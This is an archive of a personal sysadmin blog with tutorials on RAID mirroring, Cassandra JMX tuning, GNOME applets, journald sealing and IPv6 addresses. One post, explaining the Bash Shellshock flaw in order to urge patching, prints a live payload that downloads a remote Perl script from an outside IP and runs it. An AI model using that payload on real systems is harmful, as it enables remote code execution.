
Saturday, January 31, 2015

How to set up software raid mirroring for disks on xubuntu

Over time, a disk in a computer is bound to stop working, and when it does, all the data on it is lost. Oh no, that's not good! In this article, we will look at mirroring data from one disk to another using software, so that the data is duplicated on at least two disks. This greatly reduces the risk of losing data to a single disk failure! There is also hardware raid, but in this article we will look into software raid, specifically software raid one, that is, mirroring. For a detailed explanation of software raid one, please read this link, but in short, every write is saved to both disks at once and reads can be served from either disk.

This article assumes you have two disks of the same storage capacity, with only one partition per disk, and that this single partition occupies the whole disk. The operating system detects the two disks as sdb and sdc. Let's start by partitioning them. Note: creating a partition will destroy the current data on the disk, so make sure you back up your data somewhere else safely before continuing.
root@localhost:~# fdisk /dev/sdb 

Welcome to fdisk (util-linux 2.25.1).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.


Command (m for help): p
Disk /dev/sdb: 465.8 GiB, 500107862016 bytes, 976773168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00053dc0

Device Boot Start End Sectors Size Id Type
/dev/sdb1 2048 976773119 976771072 465.8G fd Linux raid autodetect

The output above is the end result you should arrive at. You can type m for help. Creating the partition is left as homework, but as a hint: add a new partition, make it the only partition, and let it use all the cylinders. Then change the partition type to Linux raid autodetect and remember to save the changes so fdisk writes the partition table and partition type to the disk.
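If you get stuck, a possible fdisk sequence looks roughly like this (a sketch only; the exact prompts differ slightly between fdisk versions):
Command (m for help): n          <- add a new partition
Partition type: p                <- primary, partition number 1
First sector: <accept default>
Last sector: <accept default, so the partition uses the whole disk>
Command (m for help): t          <- change the partition type
Hex code (type L to list all codes): fd    <- Linux raid autodetect
Command (m for help): w          <- write the partition table and exit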

Repeat this procedure for the other disk, sdc. The partition information of sdc should be identical to that of sdb above. Note: you can use fdisk -l /dev/sdb and fdisk -l /dev/sdc to verify that the disks were changed accordingly.
root@localhost:~# fdisk /dev/sdc

Welcome to fdisk (util-linux 2.25.1).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.


Command (m for help): p
Disk /dev/sdc: 465.8 GiB, 500107862016 bytes, 976773168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disklabel type: dos
Disk identifier: 0x00019748

Device Boot Start End Sectors Size Id Type
/dev/sdc1 2048 976773119 976771072 465.8G fd Linux raid autodetect

If you do not have mdadm installed, you should install it now. Installing mdadm is as easy as apt-get install mdadm. mdadm is a Linux utility used to manage software RAID devices.

After mdadm is installed, it is time to combine those two partitions into a RAID array. To do that, issue the following command.
# mdadm --create /dev/md0 --level=mirror --raid-devices=2 /dev/sdb1 /dev/sdc1

The above command should return immediately, and now you can format the new block device using the command.
# mkfs.ext4 /dev/md0

The array is now formatted with an ext4 filesystem, and you can check the mirror synchronization progress using the command cat /proc/mdstat. You can also check the raid details using the command mdadm --detail /dev/md0.
root@localhost:~# mdadm --detail /dev/md0
/dev/md0:
Version : 1.2
Creation Time : Fri Dec 12 03:54:49 2014
Raid Level : raid1
Array Size : 488254464 (465.64 GiB 499.97 GB)
Used Dev Size : 488254464 (465.64 GiB 499.97 GB)
Raid Devices : 2
Total Devices : 2
Persistence : Superblock is persistent

Intent Bitmap : Internal

Update Time : Thu Jan 8 21:42:16 2015
State : active
Active Devices : 2
Working Devices : 2
Failed Devices : 0
Spare Devices : 0

Name :
UUID : be4c04c4:349da5d9:cbcd7313:7ec7cf60
Events : 26492

Number Major Minor RaidDevice State
0 8 17 0 active sync /dev/sdb1
1 8 33 1 active sync /dev/sdc1

When the array has finished its initial synchronization, you should be able to see output like the following.
root@localhost:~# cat /proc/mdstat 
Personalities : [raid1] [linear] [multipath] [raid0] [raid6] [raid5] [raid4] [raid10]
md0 : active raid1 sdc1[1] sdb1[0]
488254464 blocks super 1.2 [2/2] [UU]
bitmap: 4/4 pages [16KB], 65536KB chunk

unused devices: <none>

Note the [UU]: if the raid is degraded, for example after a disk failure, you will see [_U] or [U_] depending on which disk has failed.

The last step is to mount this new device on a mount point so that we can start to use it. The example below creates a mount point at /mnt/myBackup and mounts md0 there.
root@localhost:~# mkdir /mnt/myBackup
root@localhost:~# mount /dev/md0 /mnt/myBackup

To make this change survive over a reboot, you should add an entry into /etc/fstab.
/dev/md0 /mnt/myBackup ext4 defaults 1 2
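If you prefer, and assuming blkid is available, you can reference the filesystem by its UUID instead of the device node, which is a little more robust if device names ever change:
root@localhost:~# blkid -s UUID -o value /dev/md0
UUID=<the value printed above> /mnt/myBackup ext4 defaults 1 2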

You should also save the raid configuration into the mdadm configuration file. The following command does just that.
root@localhost:~# mdadm --detail --scan > /etc/mdadm/mdadm.conf
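On Ubuntu-based systems such as xubuntu it is usually also worth regenerating the initramfs afterwards, so the array is assembled early during boot; this extra step is a suggestion rather than part of the original recipe:
root@localhost:~# update-initramfs -u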

That's it, I hope your data is safe from now on.

Friday, January 16, 2015

operate cassandra using jmx in terminal including changing pool size, compacting sstables and key cache

If you operate an apache cassandra cluster and the load per node grows huge (for example, nodetool info shows 800GB), compactions become a problem. It is a big problem for apache cassandra 1.0.8 if the average load per node hovers around 600GB to 1TB. Read performance suffers and at times the system load goes high. In some instances, I noticed that when repair is running, the system load goes above 20. An occasional spike is not a concern, but the more often you see this, the more likely something has gone wrong. Today, I will share my experience on how to operate cassandra when the node load is huge and the cassandra instance is still running. Often there are useful methods exposed via jmx, but for operating remotely a jmx gui client such as jmxconsole is not ideal. Instead, we will use jmxterm for these operations in apache cassandra 1.0.8. So let's get started.

Changing pool size

It is pretty simple: launch jmxterm, select the bean, and then set the CorePoolSize. The steps are illustrated below.
$ java -jar jmxterm-1.0-alpha-4-uber.jar
$>open localhost:7199
#Connection to localhost:7199 is opened
$>bean org.apache.cassandra.request:type=ReplicateOnWriteStage
#bean is set to org.apache.cassandra.request:type=ReplicateOnWriteStage
$>get CorePoolSize
#mbean = org.apache.cassandra.request:type=ReplicateOnWriteStage:
CorePoolSize = 32;
$>info
#mbean = org.apache.cassandra.request:type=ReplicateOnWriteStage
#class name = org.apache.cassandra.concurrent.JMXConfigurableThreadPoolExecutor
# attributes
%0 - ActiveCount (int, r)
%1 - CompletedTasks (long, r)
%2 - CorePoolSize (int, rw)
%3 - CurrentlyBlockedTasks (int, r)
%4 - PendingTasks (long, r)
%5 - TotalBlockedTasks (int, r)
#there's no operations
#there's no notifications
$>set CorePoolSize 64
$>get CorePoolSize
#mbean = org.apache.cassandra.request:type=ReplicateOnWriteStage:
CorePoolSize = 64;
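As a side note, jmxterm can also be driven non-interactively, which is handy for scripting; a sketch, assuming this jmxterm build supports the -l (location) and -n (non-interactive) options:
$ echo "get -b org.apache.cassandra.request:type=ReplicateOnWriteStage CorePoolSize" | java -jar jmxterm-1.0-alpha-4-uber.jar -l localhost:7199 -n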

Alter key cache

Often, when there is heap pressure in the JVM, the cache safety valve kicks in and shrinks the key cache. You can restart the cassandra instance, or you can set the key cache capacity back to its initial value. Assuming your column family is named FooBar and the keyspace is just4fun, the following steps illustrate how this is done.
$>bean org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches
#bean is set to org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches
$>info
#mbean = org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches
#class name = org.apache.cassandra.cache.AutoSavingKeyCache
# attributes
%0 - Capacity (int, rw)
%1 - Hits (long, r)
%2 - RecentHitRate (double, r)
%3 - Requests (long, r)
%4 - Size (int, r)
#there's no operations
#there's no notifications
$>
$>get Size
#mbean = org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches:
Size = 122307;

$>set Capacity 250000
#Value of attribute Capacity is set to 250000
$>get Capacity;
#mbean = org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches:
$>get Capacity
#mbean = org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches:
Capacity = 250000;

Compact sstable

Lastly, compacting sstables. It's amazing that we have an sstable as huge as 84GB! Triggering a major compaction is not an option here; when the load per node goes beyond 600GB, compaction takes forever, GC kicks in and the cpu keeps collecting the heap, making the system load go high. So here we will select one huge sstable and compact only that one. You can also select a few sstables and compact them together, separated by commas.
$>bean org.apache.cassandra.db:type=CompactionManager
#bean is set to org.apache.cassandra.db:type=CompactionManager
$>run forceUserDefinedCompaction just4fun FooBar-hc-5-Index.db
#calling operation forceUserDefinedCompaction of mbean org.apache.cassandra.db:type=CompactionManager
#RuntimeMBeanException: java.lang.IllegalArgumentException: FooBar-hc-5-Index.db does not appear to be a data file
$>run forceUserDefinedCompaction just4fun FooBar-hc-401-Data.db
#calling operation forceUserDefinedCompaction of mbean org.apache.cassandra.db:type=CompactionManager
#operation returns:
null
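To follow the progress of this user defined compaction from another terminal, a quick check (assuming nodetool points at the same instance) is:
$ nodetool -h localhost compactionstats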

The compaction should now have started; you can check its progress in the cassandra system log or with nodetool compactionstats as above. So that's it, I hope you learned something.

Sunday, January 4, 2015

Embed video into debian mediawiki

Today's article is a bit special and a short one; we will configure something interesting. We will embed video into mediawiki on debian. It's actually a request from a friend, so we will take a look at how to do it. See the screenshot below, and if you want to do something like this, read on.

mediawiki_Extension_EmbedVideo

 

Before we get started, you will require root access on the debian host and a mediawiki that is already installed and configured.

1. change directory to
# cd /usr/share/mediawiki-extensions

2. clone the mediawiki embedvideo source from github.
# git clone https://github.com/Alexia/mediawiki-embedvideo.git

3. enable this extension.
# cd /etc/mediawiki-extensions/extensions-available
# ln -s /usr/share/mediawiki-extensions/mediawiki-embedvideo/EmbedVideo.php
# cd ../extensions-enabled
# ln -s ../extensions-available/EmbedVideo.php

Easy! Three easy steps. Now let's edit a wiki page; an example is shown below.
[https://www.youtube.com/watch?v=xmmYEtS13BQ Al Gromer Khan & Klaus Wiese - The Alchemy of Happiness]
{{#ev:youtube|xmmYEtS13BQ}}

[https://www.youtube.com/watch?v=ls7NMH_O5Ck&list=RDVpxBTgbeMsw&index=10 RELAXING MUSIC Relax Mind Body, Sleep Music, Meditation music, Relaxation Music Stress Relief]
{{#ev:youtube|ls7NMH_O5Ck}}

Save the page and that's it!

Sunday, December 21, 2014

apache cassandra 1.0.8 out of memory error unable to create new native thread

If you are using apache cassandra 1.0.8 and hitting an exception such as the one below, you may want to read further. Today, we will investigate what this error means and what we can do to correct the situation.
ERROR [Thread-273] 2012-14-10 16:33:18,328 AbstractCassandraDaemon.java (line 139) Fatal exception in thread Thread[Thread-273,5,main]
java.lang.OutOfMemoryError: unable to create new native thread
at java.lang.Thread.start0(Native Method)
at java.lang.Thread.start(Thread.java:640)
at java.util.concurrent.ThreadPoolExecutor.addIfUnderMaximumPoolSize(ThreadPoolExecutor.java:727)
at java.util.concurrent.ThreadPoolExecutor.execute(ThreadPoolExecutor.java:657)
at org.apache.cassandra.thrift.CustomTThreadPoolServer.serve(CustomTThreadPoolServer.java:104)
at org.apache.cassandra.thrift.CassandraDaemon$ThriftServer.run(CassandraDaemon.java:214)

This is not good; the application crashed with this error during operation. To describe the environment: it is running oracle java 6 with apache cassandra 1.0.8, with 12GB of java heap assigned, a stack size of 128k, max user processes at 260000 and open files capped at 65536.

Investigating the java stack trace reveals that this error is not thrown by java code but by native code. Below is the trace path.

  1. https://github.com/apache/cassandra/blob/cassandra-0.8/src/java/org/apache/cassandra/thrift/CassandraDaemon.java#L214

  2. https://github.com/apache/cassandra/blob/cassandra-1.0.8/src/java/org/apache/cassandra/thrift/CustomTThreadPoolServer.java#L104

  3. ThreadPoolExecutor.java line 657
    cassandra_investigation_1

  4. ThreadPoolExecutor.java line 727
    cassandra_investigation_2

  5. Thread.java line 640
    cassandra_investigation_3


A little explanation before we delve deeper: items 3 to 5 are jdk dependent, hence if you are using openjdk the line numbers may be different. As mentioned earlier, I'm using the oracle jdk. Unfortunately, it is not available online for browsing, but you can download the source from the oracle site.

Because this is a native call, we will look into code that is not Java. If the following code looks alien to you, it looks alien to me too, as it is written in C++. As you may have noticed, this code is taken from openjdk and is not found in the oracle jdk; that part is probably closed source, but we will not go there. Let's just focus on where this error is thrown from and why. It is taken from here and the explanation is here.
JVM_ENTRY(void, JVM_StartThread(JNIEnv* env, jobject jthread))
  JVMWrapper("JVM_StartThread");
  JavaThread *native_thread = NULL;

  // We cannot hold the Threads_lock when we throw an exception,
  // due to rank ordering issues. Example: we might need to grab the
  // Heap_lock while we construct the exception.
  bool throw_illegal_thread_state = false;

  // We must release the Threads_lock before we can post a jvmti event
  // in Thread::start.
  {
    // Ensure that the C++ Thread and OSThread structures aren't freed before
    // we operate.
    MutexLocker mu(Threads_lock);

    // Since JDK 5 the java.lang.Thread threadStatus is used to prevent
    // re-starting an already started thread, so we should usually find
    // that the JavaThread is null. However for a JNI attached thread
    // there is a small window between the Thread object being created
    // (with its JavaThread set) and the update to its threadStatus, so we
    // have to check for this
    if (java_lang_Thread::thread(JNIHandles::resolve_non_null(jthread)) != NULL) {
      throw_illegal_thread_state = true;
    } else {
      // We could also check the stillborn flag to see if this thread was already stopped, but
      // for historical reasons we let the thread detect that itself when it starts running

      jlong size =
             java_lang_Thread::stackSize(JNIHandles::resolve_non_null(jthread));
      // Allocate the C++ Thread structure and create the native thread. The
      // stack size retrieved from java is signed, but the constructor takes
      // size_t (an unsigned type), so avoid passing negative values which would
      // result in really large stacks.
      size_t sz = size > 0 ? (size_t) size : 0;
      native_thread = new JavaThread(&thread_entry, sz);

      // At this point it may be possible that no osthread was created for the
      // JavaThread due to lack of memory. Check for this situation and throw
      // an exception if necessary. Eventually we may want to change this so
      // that we only grab the lock if the thread was created successfully -
      // then we can also do this check and throw the exception in the
      // JavaThread constructor.
      if (native_thread->osthread() != NULL) {
        // Note: the current thread is not being used within "prepare".
        native_thread->prepare(jthread);
      }
    }
  }

  if (throw_illegal_thread_state) {
    THROW(vmSymbols::java_lang_IllegalThreadStateException());
  }

  assert(native_thread != NULL, "Starting null thread?");

  if (native_thread->osthread() == NULL) {
    // No one should hold a reference to the 'native_thread'.
    delete native_thread;
    if (JvmtiExport::should_post_resource_exhausted()) {
      JvmtiExport::post_resource_exhausted(
        JVMTI_RESOURCE_EXHAUSTED_OOM_ERROR | JVMTI_RESOURCE_EXHAUSTED_THREADS,
        "unable to create new native thread");
    }
    THROW_MSG(vmSymbols::java_lang_OutOfMemoryError(),
              "unable to create new native thread");
  }

  Thread::start(native_thread);

JVM_END

As I don't have much knowledge of C++, there is no deep analysis of the snippet above, but if you understand what it does, I would be happy if you could give your analysis as a comment below this article. It certainly looks to me like the operating system cannot create a thread at this point, and the JVM reports this as JVMTI_RESOURCE_EXHAUSTED_OOM_ERROR and/or JVMTI_RESOURCE_EXHAUSTED_THREADS. Let's google to find out what that is supposed to mean. Below are some links which are interesting.

To summarize the analysis from the links above.

  • a stack is created whenever a thread is created, hence as more threads are created, the total stack memory also increases.

  • A Java Virtual Machine stack stores frames. A Java Virtual Machine stack is analogous to the stack of a conventional language such as C: it holds local variables and partial results, and plays a part in method invocation and return.

  • the Java stack is not part of the java heap; hence, even if you increase the java heap given to cassandra via the -Xms or -Xmx parameters, this error will happen again if the same condition is met in the future.

  • If Java Virtual Machine stacks can be dynamically expanded, and expansion is attempted but insufficient memory can be made available to effect the expansion, or if insufficient memory can be made available to create the initial Java Virtual Machine stack for a new thread, the Java Virtual Machine throws an OutOfMemoryError.


Based on the analysis so far, it certainly looks to me like the cassandra instance tried to create a new thread and was not able to, because the underlying operating system could not create it. It looks like the operating system did not have sufficient memory left to create the thread, hence increasing -Xms or -Xmx will not solve the problem. Note that the file descriptor limit is not the culprit here either, as most of those limits are set practically to infinite.
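A few commands that may help confirm this on a running node; matching the process by the string CassandraDaemon is an assumption about how the instance was started:
$ ps -o nlwp= -p $(pgrep -f CassandraDaemon)     # number of native threads the cassandra process currently owns
$ ulimit -u                                      # per-user process/thread limit for the current shell
$ cat /proc/sys/kernel/threads-max               # kernel-wide limit on the number of threads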

Interestingly, one suggested way to work around this error is to decrease -Xss, or even the heap via -Xms and -Xmx, so that more native memory is left for thread stacks. You could try it, but I have my doubts: if the cassandra node already has high heap usage, decreasing the heap will only create another type of problem.

If you have encountered such a problem before and have a good fix, please leave a comment below this article. To end, as of this writing there is a discussion happening on the cassandra mailing list.

Sunday, December 7, 2014

Gnome goodies: add a hardware sensor applet to the panel, add a stock indicator to the panel.

Today we will add two more applets to the gnome panel. You might want to look into the past article about gnome applets that were configured before. Okay, let's start by installing an applet that will show hardware temperature.

There is a nice package, psensor, and it can be installed as easily as
$ sudo apt-get install psensor
$ psensor

So just launch the application from the terminal, then see the screenshot below.

psensor

On the left, I have configured three temperatures to be plotted. Because the hardware differs between computers, you can enable plotting for whatever sensors your hardware exposes. On the right are the psensor preferences, where I have enabled the checkboxes for Launch on session startup and Hide window on startup.

Next, we will install a stock applet as a favor for a friend. This is not available in debian, so we will download it from an ubuntu repository. Point your browser to https://launchpad.net/~ce3a/+archive/ubuntu/indicator-stocks/+packages and download the latest version of indicator-stocks. As of this writing, I'm installing indicator-stocks_0.2.4-0ubuntu1_amd64.
user@localhost:~/Desktop$ sudo dpkg -i indicator-stocks_0.2.4-0ubuntu1_amd64.deb 
Selecting previously unselected package indicator-stocks.
(Reading database ... 321688 files and directories currently installed.)
Preparing to unpack indicator-stocks_0.2.4-0ubuntu1_amd64.deb ...
Unpacking indicator-stocks (0.2.4-0ubuntu1) ...
dpkg: dependency problems prevent configuration of indicator-stocks:
indicator-stocks depends on libappindicator0.1-cil; however:
Package libappindicator0.1-cil is not installed.

dpkg: error processing package indicator-stocks (--install):
dependency problems - leaving unconfigured
Processing triggers for gnome-menus (3.13.3-2) ...
Processing triggers for mime-support (3.57) ...
Processing triggers for desktop-file-utils (0.22-1) ...
Processing triggers for hicolor-icon-theme (0.13-1) ...
Errors were encountered while processing:
indicator-stocks

As you can read above, there is a dependency problem while installing indicator-stocks. Just use apt-get to pull in the missing package; it is a simple process to resolve with apt, see the example below. Once it is finally installed, check the screenshot further down. You can configure a few symbols; the data comes from finance.yahoo.com.
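One standard way to pull in the missing dependency and finish the configuration is apt's fix-broken mode:
user@localhost:~/Desktop$ sudo apt-get -f install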

indicator-stocks

That's it. Between the past articles and this one, I hope your desktop now presents as much information as possible.

Friday, November 21, 2014

Gnome goodies: How to sort directories before files. How to enable weather in the gnome panel

Today we will take a look at two gnome3 applets. I used to have these settings back in gnome and gnome2 and I think this is a very nice goody that should remain in gnome3.

How to sort directories before files

In gnome3, files and folders are mixed together, for example when the folder is sorted by modification date. See the example screenshot below.

folders_files_mixed

My personal preference is for folders to be grouped first, followed by normal files. See the example screenshot below.

folders_then_files

In order to achieve this behaviour, the gnome configuration needs to be altered. Launch dconf-editor from the command line and navigate to org -> gnome -> nautilus -> preferences, then check sort-directories-first. See the screenshot below (there is also a command line alternative after it). Easy :)

dconf_editor-sort-directories-first
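If you prefer the command line, the same preference can be flipped with gsettings (assuming the stock nautilus schema):
$ gsettings set org.gnome.nautilus.preferences sort-directories-first true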

 

How to enable weather in the gnome panel

In gnome2, it was as easy as adding a location in the drop down of the date/time applet. See the screenshot below.

timezone_world_map

However, things changed in gnome3: the date/time applet no longer shows weather information. There is an alternative; the gnome-shell-extension-weather package adds weather information to the gnome panel. See the screenshot below.

gnome-shell-extension-openweather

Installing this extension is as easy as apt-get install gnome-shell-extension-weather.

To show gnome-shell-extension-weather in the gnome panel, you need to enable it: launch gnome-shell-extension-prefs from the command line, search for OpenWeather and flip the switch to the on position. See the screenshot below.

gnome-shell-extension-prefs

Now the weather information should show in the gnome panel! Start adding more places of interest in the applet! :)

To end this article, try to add places of interest in the weather applet :) I will leave this as an exercise for you.

Sunday, November 9, 2014

gnome-clocks alternative to gnome2 world timezone map

Back in the gnome2 days, I liked the world map that showed the earth's timezone information. Take a look at the screenshot below: it shows which part of the earth is in daylight and which part is in night, and you can also see per-country weather information like temperature, wind speed, sunrise and sunset.

timezone_world_map

In gnome3, however, all this information is lost. I don't know why, but the upgrade to gnome3 feels like a step backwards: a lot of useful information applets are gone. Not only that, the window animations constantly keep the cpu busy and application response sometimes gets slow. Something to ponder: maybe I should choose a different window manager.

Anyway, in the meantime, let's take a look at an alternative to the gnome2 world timezone information. I googled and found gnome-clocks.

Simple GNOME app with stopwatch, timer, and world clock support. GNOME Clocks is a simple application to show the time and date in multiple locations and set alarms or timers. A stopwatch is also included.
user@localhost:~$ sudo apt-get install gnome-clocks
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
linux-image-amd64
Use 'apt-get autoremove' to remove it.
The following NEW packages will be installed:
gnome-clocks
0 upgraded, 1 newly installed, 0 to remove and 691 not upgraded.
Need to get 326 kB of archives.
After this operation, 1,193 kB of additional disk space will be used.
Get:1 http://cdn.debian.net/debian/ unstable/main gnome-clocks amd64 3.14.0-1 [326 kB]
Fetched 326 kB in 4s (66.8 kB/s)
Selecting previously unselected package gnome-clocks.
(Reading database ... 320953 files and directories currently installed.)
Preparing to unpack .../gnome-clocks_3.14.0-1_amd64.deb ...
Unpacking gnome-clocks (3.14.0-1) ...
Processing triggers for libglib2.0-0:i386 (2.42.0-2) ...
Processing triggers for libglib2.0-0:amd64 (2.42.0-2) ...
Processing triggers for hicolor-icon-theme (0.13-1) ...
Processing triggers for gnome-menus (3.13.3-2) ...
Processing triggers for mime-support (3.57) ...
Processing triggers for desktop-file-utils (0.22-1) ...
Setting up gnome-clocks (3.14.0-1) ...

So all good, let's launch it. You can either launch gnome-clocks from the command line or from the date/time panel. See the screenshot below and click on Open Clocks.

gnome-clock

As seen below, I have configured a few cities. How to add the time for a city is left as an exercise for you, and I promise it will not be that difficult ;). Unfortunately it does not show information other than the clock, which is a pity. Anyway, better than nothing, until someone is generous enough to develop additional information like weather and a graphical earth day/night map.

gnome-clock-main-window

That's it people, I hope you find some nice replacements when you transition to the gnome3 environment.

Saturday, November 8, 2014

Set date in gnome3 gnome-shell panel

If you came from gnome2 or before, you could easily alter the date and time configuration in the panel. I don't know why the changes in gnome3 make everything so painful to configure; it is supposed to be easy and intuitive and achievable in a few seconds, but that is not the case anymore. Today, we will change the default configuration to something we are used to. See the screenshot below.

dconf_editor_datetime_config_before

Introducing dconf-editor.

The dconf-editor program provides a graphical interface for editing settings that are stored in the dconf database. The gsettings(1) utility provides similar functionality on the commandline.

So install this package if it is not available. Let's launch the app.
user@localhost:~$ dconf-editor

The dconf-editor window pops up. In the tree menu on the left, expand in this succession: org -> gnome -> desktop -> interface. Check the button for the field you would like to enable. In the screenshot below, I have enabled the settings I am used to: show the date and show seconds. The same can be done from the command line, as shown after the screenshot.

dconf_editor_datetime_config_after
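The same settings can also be changed from a terminal with gsettings (assuming the standard org.gnome.desktop.interface schema):
user@localhost:~$ gsettings set org.gnome.desktop.interface clock-show-date true
user@localhost:~$ gsettings set org.gnome.desktop.interface clock-show-seconds true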

That's it, in the next article, we will probably look into the earth daylight map on the date / time calendar. I like that feature too but somehow it is not available in gnome3.

Saturday, October 25, 2014

Why CVE-2014-7169 is important and why you should patch your system

Recently I came across this link and read about it. Before we go into the details, let's understand what it is.

From Red Hat errata https://rhn.redhat.com/errata/RHSA-2014-1306.html

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

So let's check my system. Hmm.. my local host is affected :-)
jason@localhost:~$ env x='() { :;}; echo vulnerable'  bash -c "echo this is a test"
vulnerable
this is a test
jason@localhost:~$ whoami
jason

But why is this important? The user is still running with his own privileges. It turns out this exploit allows a remote attacker to execute a script remotely. Let's change the payload a bit.
() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur"

See the point? Does it look scary? A remote script is downloaded to your system and executed. So any local service that uses the shell for interpretation is basically vulnerable, and you should patch bash as soon as possible. As of this writing, the patch is out; in CentOS 7, the fix is included in the package bash-4.2.45-5.el7_0.4.x86_64. Read the changelog below.
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.45-5.4
- CVE-2014-7169
Resolves: #1146324
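A quick way to check and update a CentOS box (the package and changelog queries follow the usual rpm/yum conventions):
# rpm -q --changelog bash | grep CVE-2014-7169     <- shows the entry above if the fix is installed
# yum update bash                                  <- pulls in the patched package if it is not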

Below are some services which use bash; if your system runs any of them, you should know what to do.

  • ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.

  • Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).

  • PHP scripts executed with mod_php are not affected even if they spawn subshells.

  • DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.

  • Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

  • Any other application which is hooked onto a shell or runs a shell script using Bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.


Thanks, that's it for this article. Be good and stay safe.

Sunday, October 12, 2014

Enable FSS in journald and verify using journalctl

Last time we learned the basics of journalctl; today we will enable FSS in journald.

Forward Secure Sealing or FSS allows application to cryptographically "seal" the system logs in regular time intervals, so that if your machine is hacked the attacker cannot alter log history (but can still entirely delete it). It works by generating a key pair of "sealing key" and "verification key".

read more at https://eprint.iacr.org/2013/397

Okay, let's set it up. We will use CentOS 7 for this.

As root, let's setup the keys.
[root@centos7-test1 ~]# journalctl --setup-keys
/var/log/journal is not a directory, must be using persistent logging for FSS.

Hmm.. not possible, because the journal currently lives under /run, which is mounted on tmpfs. We will now enable persistent storage for journald.

  1. as root, create directory # mkdir -p /var/log/journal 

  2. edit /etc/systemd/journald.conf and uncomment the following.

    1. Storage=persistent

    2. Seal=yes



  3. restart journald using command systemctl restart systemd-journald 

  4. Rerun command journalctl --setup-keys. See screenshot below.
    journald-fss

  5. Now we verify the log using command
    [root@centos7-test1 ~]# journalctl --verify
    PASS: /var/log/journal/e25a4e0b618f43879af033a74902d0af/system.journal



Looks good, although I am not sure about the verify key: even when a different verification key is used, the check always passes. Presumably it will fail if the log has been tampered with.
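For a stricter check, --verify accepts the verification key that --setup-keys printed earlier; a sketch, with the key value being the one from your own setup:
[root@centos7-test1 ~]# journalctl --verify --verify-key=<verification key from --setup-keys>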

Friday, October 10, 2014

Derive IPv6 link-local address for network interface

When you show the interface configuration using the ip command, you will notice there is an inet6 address starting with fe80. Today, we will learn what this is and how this address is derived. Example below:
user@localhost:~$ ip addr show wlan0
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
link/ether 4c:33:22:11:aa:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.133.50/24 brd 192.168.133.255 scope global wlan0
valid_lft forever preferred_lft forever
inet6 2001:e68:5424:d2dd:4e33:22ff:fe11:aaee/64 scope global dynamic
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::4e33:22ff:fe11:aaee/64 scope link
valid_lft forever preferred_lft forever

So first, what is Link-local address?

In a computer network, a link-local address is a network address that is valid only for communications within the network segment (link) or the broadcast domain that the host is connected to.

Link-local addresses are usually not guaranteed to be unique beyond a single network segment. Routers therefore do not forward packets with link-local addresses.

For protocols that have only link-local addresses, such as Ethernet, hardware addresses that the manufacturer delivers in network circuits are unique, consisting of a vendor identification and a serial identifier.

Link-local addresses for IPv4 are defined in the address block 169.254.0.0/16, in CIDR notation. In IPv6, they are assigned with the fe80::/10 prefix.

So it is an address that is local to a network segment and is not routed beyond a router.

With this said, let's calculate link-local address.

1. take the mac address from ip command.
from above example 4c:33:22:11:aa:ee

2. add ff:fe in the middle of the current mac address.
4c:33:22:ff:fe:11:aa:ee

3. reformat to IPv6 notation by concatenating each pair of hex groups into one.
4c33:22ff:fe11:aaee

4. convert the first octet from hexadecimal to binary
4c -> 01001100

5. invert the bit at position 6, starting from left with first bit as 0.
01001100 -> 01001110

6. convert the octet from step 5 back to hexadecimal
01001110 -> 4e

7. replace first octet with newly calculated from step 6.
4e33:22ff:fe11:aaee

8. prepend the link-local prefix
fe80::4e33:22ff:fe11:aaee
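The whole calculation can also be scripted; a minimal bash sketch using the example MAC address above:
#!/bin/bash
# derive the IPv6 link-local (EUI-64 based) address from a MAC address
mac="4c:33:22:11:aa:ee"                      # example MAC from step 1
IFS=: read -r o1 o2 o3 o4 o5 o6 <<< "$mac"
o1=$(printf '%02x' $(( 0x$o1 ^ 0x02 )))      # flip the universal/local bit (step 5)
echo "fe80::${o1}${o2}:${o3}ff:fe${o4}:${o5}${o6}"   # prints fe80::4e33:22ff:fe11:aaee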

That's it.

Saturday, September 27, 2014

Study journalctl in CentOS 7

In CentOS 7, the new systemd has a new journaling app, known as journalctl. Today, we will study journalctl. First, what is journalctl?

journalctl is a client app to query the systemd journal. The systemd journal is written by systemd-journald.service.

Let's sudo into root and we will study journalctl via examples.
[user@localhost ~]$ sudo su -
Last login: Sat Sep 13 11:57:55 CEST 2014 on pts/0
[user@localhost ~]# journalctl
